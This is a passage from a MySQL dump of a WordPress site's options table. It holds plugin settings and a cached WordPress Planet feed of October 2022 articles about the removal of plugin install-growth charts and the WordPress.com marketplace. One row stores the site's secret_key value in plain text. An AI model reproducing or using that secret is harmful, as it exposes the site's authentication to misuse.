\";b:0;s:3:\"cdn\";b:0;s:11:\"auto_resize\";b:0;s:4:\"webp\";b:1;s:5:\"usage\";b:0;s:17:\"accessible_colors\";b:0;s:9:\"keep_data\";b:1;s:9:\"lazy_load\";b:1;s:17:\"background_images\";b:1;s:16:\"rest_api_support\";b:0;s:8:\"webp_mod\";b:0;}','yes'),(520,'wp-smush-install-type','existing','no'),(521,'wp-smush-version','3.11.1','no'),(524,'action_scheduler_migration_status','complete','yes'),(1076,'wpmudev_notices','a:3:{s:7:\"plugins\";a:1:{s:8:\"defender\";i:1661214975;}s:5:\"queue\";a:1:{s:8:\"defender\";a:3:{s:5:\"email\";i:1661344313;s:4:\"rate\";i:1661819775;s:8:\"giveaway\";i:1661257913;}}s:4:\"done\";a:0:{}}','no'),(399,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(446,'_transient_health-check-site-status-result','{\"good\":16,\"recommended\":2,\"critical\":1}','yes'),(1740,'secret_key','7LseO1FeSyQ:N=-4t(L^;6:+w!e~|]rOigcTsOcDzdB3eV%7!ek sITnxD43BYAl','no'),(20023,'_transient_timeout_feed_mod_9bbd59226dc36b9b26cd43f15694c5c3','1666332513','no'),(20024,'_transient_feed_mod_9bbd59226dc36b9b26cd43f15694c5c3','1666289313','no'),(20025,'_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9','1666332513','no');
INSERT INTO `wp0y_options` VALUES (20026,'_transient_feed_d117b5738fbd35bd8c0391cda1f2b5d9','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n	\n	\n	\n	\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"Do The Woo Community: A WooSesh Chat with Allie Brock and Daniel Espinoza\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=73152\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://dothewoo.io/woosesh-chat-allie-brock-daniel-espinoza/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:415:\"<p>In this episode we dive into a WooCommerce headless case study and discover some insights into monitoring your clients shops. </p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/woosesh-chat-allie-brock-daniel-espinoza/\">A WooSesh Chat with Allie Brock and Daniel Espinoza</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Oct 2022 10:13:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"Post Status: Five takes on helpful plugin stats and insights\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=137754\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://poststatus.com/five-takes-on-helpful-plugin-stats-and-insights/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6809:\"<div class=\"wp-container-1 wp-block-group eplus-wrapper has-theme-palette-2-color has-theme-palette-8-background-color has-text-color has-background\"><div class=\"wp-block-group__inner-container\"><div class=\"wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\">Good ideas for the future of data disclosed to plugin authors using the wordpress.org repository: <br /><br />1) Identify surges of unhappy users reacting to a bad release — and the opposite, happier outcome.<br /><br />2) Use pageview analytics to estimate total potential user interest and conversion rates. <br /><br />3) Assess a plugin\'s performance with the .org search algorithm, the quality of releases, and plugin incompatibility as well as PHP compatibility issues. <br /><br />4) Collect significant user behavior data anonymously without phoning home. <br /><br />5) Just reveal all the raw data with privacy options for individual authors — no interpretive analysis on wordpress.org.<br /><br />BONUS: Let\'s take this discussion somewhere else! </p></div>\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n\n<p class=\"yoast-reading-time__wrapper\"><span class=\"yoast-reading-time__icon\"></span><span class=\"yoast-reading-time__spacer\"></span><span class=\"yoast-reading-time__descriptive-text\">Estimated reading time:  </span><span class=\"yoast-reading-time__reading-time\">3</span><span class=\"yoast-reading-time__time-unit\"> minutes</span></p>\n</div></div>\n\n\n\n<p class=\"has-drop-cap\">In the <strong>Trac</strong> <a href=\"https://meta.trac.wordpress.org/ticket/6511\">ticket</a> for the WordPress.org Active Install Growth charts, the helpful comments offering actionable suggestions comprise about 5% of the total.  At least that makes it easy to summarize the five useful ones here.</p>\n\n\n\n<p>First of all, <a href=\"https://meta.trac.wordpress.org/ticket/6511#comment:101\">Matt Cromwell</a> called for a new and proper discussion elsewhere, in a more appropriate setting where stakeholders can &#8220;start a process of talking publicly and with intention and strategy on what it would look like to have real actionable plugin/theme stats that authors need.&#8221; To that end, Matt proposed closing the Trac discussion:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>Let\'s close this ticket as &#8220;wont fix&#8221; and move on to more important and longterm strategies that actually benefit the plugin community. The longer we haggle over these ineffective charts, the longer it\'ll take to actually start getting real plugin data that is meaningful.</p></blockquote>\n\n\n\n<h2 id=\"h-unhappy-users-reacting-to-a-bad-release\">Unhappy Users Reacting to a Bad Release</h2>\n\n\n\n<p><strong>Natalie MacLees</strong> describes <a href=\"https://meta.trac.wordpress.org/ticket/6511#comment:30\">monitoring incoming support requests relative to the current number of active installs</a> and any dip in install growth following releases with &#8220;new features&#8221; or &#8220;large changes&#8221; to &#8220;judge whether a change to a plugin was a positive or negative one.&#8221; <strong>Benjamin I</strong>ntal echoed this, and previously <strong>Steve Burge</strong> said he has a similar practice. No doubt others do too. </p>\n\n\n\n<h2>Total Potential User Interest</h2>\n\n\n\n<p><strong>Sybre Waaijer</strong> suggested <a href=\"https://meta.trac.wordpress.org/ticket/6511#comment:62\">sharing page views and bounce rates for individual plugin pages</a>. Paired with install stats, this would give plugin owners a conversion rate for potential customers coming through wp.org.</p>\n\n\n\n<h2>Site Search Performance, Release Quality, and Compatibility</h2>\n\n\n\n<p><strong>Amber Hinds</strong>&#8216; <a href=\"https://meta.trac.wordpress.org/ticket/6511#comment:105\">blue sky wishlist</a> starts with &#8220;Things that tell us if our readme [which is read by the repo\'s search algorithm] and other ranking factors are on track.&#8221; These are smart, useful metrics:</p>\n\n\n\n<ul class=\"has-theme-palette-8-background-color has-background\"><li>Number of searches (or impressions) for target keywords</li><li>Average ranking for target keywords for timeframe (month)</li><li>Conversion rates from impression to install for target keywords</li></ul>\n\n\n\n<p>So are &#8220;Things that tell us if we may have a problem with our plugin&#8221; like:</p>\n\n\n\n<ul class=\"has-theme-palette-8-background-color has-background\"><li>Number of deactivations per timeframe (month, preferably week)</li><li>Number of deletions per timeframe (month, preferably week)</li><li>Average time from activation to deactivation or deletion</li></ul>\n\n\n\n<p>And finally, &#8220;Things for better testing of releases&#8221; could include:</p>\n\n\n\n<ul class=\"has-theme-palette-8-background-color has-background\"><li>Top 20 plugins also active [on a site with your plugin installed and active]</li><li>Top 20 themes also active</li><li>PHP versions (percentage)</li><li>WordPress versions (percentage)</li></ul>\n\n\n\n<h2>Sophisticated Behavioral Data Without Telemetry</h2>\n\n\n\n<p><strong>Vito Peleg</strong> shared <a href=\"https://meta.trac.wordpress.org/ticket/6511#comment:106\">a list of his preferred metrics</a> from the wp.org repo <a href=\"https://twitter.com/VitoPeleg/status/1577784069596876800\">on Twitter</a>, which <strong>Matt Mullenweg</strong> indicated &#8220;are very doable.&#8221; <strong>Mark Zahra</strong> brought Vito\'s ideas into the Trac ticket discussion:</p>\n\n\n\n<ul class=\"has-theme-palette-8-background-color has-background\"><li>Time to churn (to deactivate) signals good/bad onboarding, UI/UX</li><li>Repeat installs &#8211; how many users (anonymized) install on multiple sites for community opp & advocacy</li><li>Time to result: dev can choose 1 single hook to trigger as “result” and the calculation checks how long from install to get there. By changing the placement of the hook devs can optimize entire flows.</li><li>Inner page tracker: which/how many inner plugin pages users visit</li><li>PHP ver distribution, general country-based installs, active install to review ratio</li></ul>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Some of these are very doable.</p>&mdash; Matt Mullenweg (@photomatt) <a href=\"https://twitter.com/photomatt/status/1577981852857475072?ref_src=twsrc%5Etfw\">October 6, 2022</a></blockquote>\n</div>\n\n\n\n<h2>Open All the Data, Let the Community Interpret It</h2>\n\n\n\n<p>Finally, <a href=\"https://poststatus.slack.com/archives/CHNM7Q7T8/p1665703515129299\">in <strong>Post Status Slack</strong></a>, <strong>Drupal.org</strong> has been recommended as a model for simply revealing all the raw data without interpretation and leaving that to the community.</p>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Oct 2022 06:36:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Dan Knauss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"Post Status: How to sell plugins, themes, and services on WordPress.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=137746\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"https://poststatus.com/how-to-sell-plugins-themes-and-services-on-wordpress-com/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:652:\"<ol><li>Read the <a href=\"https://developer.wordpress.com/wordpress-com-marketplace/submitting-a-product-to-wordpress-com/\">FAQ</a>.</li><li>Fill out <a href=\"https://wordpress.com/partners/\">this form</a>.</li><li>Agree to the <a href=\"https://developer.wordpress.com/wordpress-com-marketplace/wordpress-com-marketplace-vendor-agreement/\">WordPress.com Marketplace Vendor Agreement</a>.</li><li>If needed, integrate with the <a href=\"https://developer.wordpress.com/wordpress-com-marketplace/vendor-apis/\">WordPress.com Store Licensing API</a>.</li></ol>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Oct 2022 04:40:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Dan Knauss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"WPTavern: Discussion on Replacing Plugin Active Install Growth Data Continues Behind Closed Doors\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=138768\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:108:\"https://wptavern.com/discussion-on-replacing-plugin-active-install-growth-data-continues-behind-closed-doors\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10185:\"<p>Earlier this month WordPress.org meta contributors <a href=\"https://wptavern.com/wordpress-org-removes-active-install-growth-data-for-plugins\">removed the active install growth chart from plugins</a>, sending plugin developers who relied on this data into a state of dismay and outrage. The commit cited &#8220;insufficient data obfuscation&#8221; but there was no clear communication about when and where this decision had been made. Developers <a href=\"https://wptavern.com/wordpress-org-plugin-developers-demand-transparency-regarding-the-removal-of-active-install-growth-data\">demanded more transparency</a> around the charts&#8217; removal but received no clear answers.</p>\n\n\n\n<p>Multiple opportunities to communicate the details behind the decision were deliberately forgone, as speculation mounted. Several contributors not directly involved in the conversations prematurely insisted it was removed due to a security or privacy concern, but Samuel Otto Wood has unequivocally confirmed that it was neither of these things.</p>\n\n\n\n<p>In a recent appearance on the <a href=\"https://wpwatercooler.com/wpwatercooler/ep432-solutions-to-the-active-growth-problem/\">WPwatercooler podcast</a>, Wood elaborated on the decision, which he says was made in May through private channels via Slack DMs in a discussion initiated by Matt Mullenweg.</p>\n\n\n\n<p>&#8220;The reason is really quite simple,&#8221; Wood said. &#8220;It was removed because by and large, nobody was using them. Nobody was using the chart itself.  By and large, the chart was not useful to the majority, and it didn’t really fit the purpose we had for it, that we had in mind when we implemented it.&#8221;</p>\n\n\n\n<p>Wood said the active growth chart was intended to just show growth or decline of a plugin on a weekly basis, but the data wasn&#8217;t working as intended:</p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>People wanted that feedback on whether plugin’s growing, whether it’s shrinking, et cetera. And that’s valuable information for developers to have,  it’s valuable information users to know. But it really wasn’t working as that.</p>\n\n\n\n<p>The data that it provided was a percentage based data, and it was a very weak percentage based data. So by and large, the majority of use of that data was people scraping the data and using it to work backwards to the exact quote, exact numbers</p>\n\n\n\n<p>That was entirely the problem was that people were largely using it to get those numbers. Now, that’s not itself bad, but a, the reverse math didn’t work. It was wrong for a number of reasons, mainly because we were doing such a way obfuscating the data in such a way that it made that number wrong.</p>\n\n\n\n<p>Second, Actually, it’s kind of funny. It actually always gave numbers a bit too high, so it was giving people the wrong impression. Third, it really, people trusted it as an active number, as a number of active cells to the point where, to the point where they, they relied on it to make decisions and things like that. It was not a good idea.</p>\n</blockquote>\n\n\n\n<p>Although Otto was not involved in working on the project at the time, he was privy to the discussion and relayed some of the details:</p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>I read through all that discussion and we worked, they worked on it for a long, Scott and several people tried various things before removing it. They adjusted the values, they adjusted numbers. They, they went through a ridiculous amount of iteration and in the end, none of it worked. People were still using it even though it was giving them basically garbage. So finally removing it was the only thing to do. We did have a plan for replacing it. We just didn’t have a plan for replacing it immediately. Nevertheless, giving them active install count numbers that are wrong is more harmful, we felt, to both users and developers interests than simply not giving them at all. So that’s why it was removed.</p>\n</blockquote>\n\n\n\n<p>The concern podcast host Sé Reed and guest Matt Cromwell highlighted was that the decision was communicated in such a way that it suggested it was security related. Since it was not a sensitive security or privacy issue, Reed asked why was it handled in a private chat instead of the meta channel when the decision had such a profound impact on developers being able to track the trajectory of their plugins.</p>\n\n\n\n<p>Since the inaccuracy of the charts was well-known to those more intimately acquainted with the problem, Wood said its removal was &#8220;not quite the big deal&#8221; that everyone else ended up perceiving it to be. They did not anticipate the firestorm the charts&#8217; removal would create in the <a href=\"https://meta.trac.wordpress.org/ticket/6511\">trac ticket</a> where developers were pleading to have them restored.</p>\n\n\n\n<p>&#8220;The physical visual chart itself is not so instrumental to the way I operate things,&#8221; GiveWP founder Matt Cromwell said. &#8220;But it’s the act of removing it without any conversation whatsoever.</p>\n\n\n\n<p>&#8220;And what does that mean for the long run of data about plugins on.org and the viability of their, of us, continuing to have them? That’s the real question. It’s an indicator of an underlying problem that isn’t getting better.&#8221;</p>\n\n\n\n<p>This incident has sparked discussions about <a href=\"https://thewpminute.com/what-should-plugin-developers-expect-from-wordpress/\">what kind of partnership plugin developers should expect from WordPress.org</a>, and whether it&#8217;s time they looked for support from one another instead of the platform, as Eric Karkovack suggested on The WP Minute. In light of plugin developers losing more valuable data that hasn&#8217;t been replaced, Alex Denning, managing director of Ellipsis, a digital marketing agency, makes the case that <a href=\"https://getellipsis.com/blog/org-is-ineffective-plugin-distribution/\">WordPress.org is ineffective for plugin distribution in 2022</a>. He contends that new WordPress plugins are not passing the 100k, 500k , or 1m+ install thresholds and the directory isn’t giving plugins organic reach.</p>\n\n\n\n<p>The focus of the ticket has changed from calling on WordPress.org to bring back the active growth charts to be more about brainstorming helpful plugin stats and insights that plugin developers would like to see. It is still receiving angry and frustrated comments from developers who believe the data should belong to the community.</p>\n\n\n\n<p>&#8220;I cannot emphasize enough that conversations about what to replace the active growth chart with should be happening in a public Slack channel or on a Trac ticket,&#8221; Equalize Digital CEO Amber Hinds said. &#8220;This data should belong to the community and the community should be able to participate in deciding how (or not) to display it.&#8221;</p>\n\n\n\n<p>The reasons that purportedly necessitate obfuscation have not been clearly explained, but many participants in the discussion have urged WordPress.org to simply publish the raw data so it can be accessed and processed independently of the platform. @Starbuck <a href=\"https://meta.trac.wordpress.org/ticket/6511#comment:108\">suggests</a> the community would then be able to create sites that render the data in meaningful and interesting ways.</p>\n\n\n\n<p>WordPress developers want far more data than was previously available. Hinds <a href=\"https://meta.trac.wordpress.org/ticket/6511#comment:105\">requested</a> an assortment of data points that may or may not be possible:</p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>Things that tell us if our readme and other ranking factors are on track:</p>\n\n\n\n<ul>\n<li>Number of searches (or impressions) for target keywords</li>\n\n\n\n<li>Average ranking for target keywords for timeframe (month)</li>\n\n\n\n<li>Conversion rates from impression to install for target keywords</li>\n</ul>\n\n\n\n<p>Things that tell us if we may have a problem with our plugin:</p>\n\n\n\n<ul>\n<li>Number of deactivations per timeframe (month, preferably week)</li>\n\n\n\n<li>Number of deletions per timeframe (month, preferably week)</li>\n\n\n\n<li>Average time from activation to deactivation or deletion</li>\n</ul>\n\n\n\n<p>Things for better testing of releases:</p>\n\n\n\n<ul>\n<li>Top 20 plugins also active</li>\n\n\n\n<li>Top 20 themes also active</li>\n\n\n\n<li>PHP versions (percentage)</li>\n\n\n\n<li>WordPress versions (percentage)</li>\n</ul>\n</blockquote>\n\n\n\n<p>Atarim CEO Vito Peleg <a href=\"https://twitter.com/VitoPeleg/status/1577784069596876800\">suggested</a> some other tools for monitoring growth/decline, to which Matt Mullenweg responded that some of the ideas were &#8220;very doable:&#8221; </p>\n\n\n\n<ul>\n<li>Time to churn (to deactivate) signals good/bad onboarding, UI/UX</li>\n\n\n\n<li>Repeat installs &#8211; how many users (anonymized) install on multiple sites for community opp &amp; advocacy</li>\n\n\n\n<li>Time to result: dev can choose 1 single hook to trigger as “result” and the calculation checks how long from install to get there. By changing the placement of the hook devs can optimize entire flows.</li>\n\n\n\n<li>Inner page tracker: which/how many inner plugin pages users visit</li>\n\n\n\n<li>PHP ver distribution, general country-based installs, active install to review ratio</li>\n</ul>\n\n\n\n<p>Wood confirmed that the active install growth charts are not coming back in their previous form and that the endpoint people were scraping before will remain disabled. He said those involved in the private discussion are monitoring the Trac ticket for feedback.  </p>\n\n\n\n<p>&#8220;What’s going to happen is, that the active install count instead of being rounded to the nearest digit is going to be changed,&#8221; Wood said. &#8220;I don’t know the exact break points cutoffs, but as an example show individual up to 50, then round to nearest 10 until thousand and nearest hundred until 10,000, for example. So that we are making the active install count much more fine grained than it has been. So in that sense, yes, we’re giving you the data. It’s not going to be exact numbers, but it’s going be much better than it was before. We’re still working on doing that.&#8221;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Oct 2022 04:38:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"Post Status: The New WooCommerce Agency Partner Program\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=137696\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://poststatus.com/the-new-woocommerce-agency-partner-program/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1333:\"<p>Here\'s <a href=\"https://dothewoo.io/all-you-should-know-about-the-woocommerce-agency-partner-program/\">everything you should know about</a> the <strong>WooCommerce Agency Partner Program</strong> with their program manager, <strong>Mary Voelker</strong>. Key takeaways:</p>\n\n\n\n<ul><li>The <a href=\"https://woocommerce.com/partner-program/\">WooExpert program</a> started in 2015, and participants had to be invited and pay for a membership in it. Agency partners in the WooExpert program (currently around 75) were handpicked until earlier this year.</li><li>Now the WooExpert certification program is free to join, but the agency rankings (silver, gold, and platinum) get listed in the <a href=\"https://partners.woocommerce.com/English/marketplace/\">WooExpert Marketplace</a>. </li><li>The certified silver, gold, and platinum agencies get free access to plugins and extensions for testing on the <a href=\"https://woocommerce.com/products/\">WooCommerce Marketplace</a> — and their top customers are eligible for priority support. </li><li>The WooCommerce.com sales team matches and sends qualified leads to certified agency partners based on an assessment of each lead and their suitability for a specific agency partner. </li></ul>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Oct 2022 03:45:28 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Dan Knauss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"Post Status: November: Register to speak at WordFest Live — and come to WordPress Accessibility 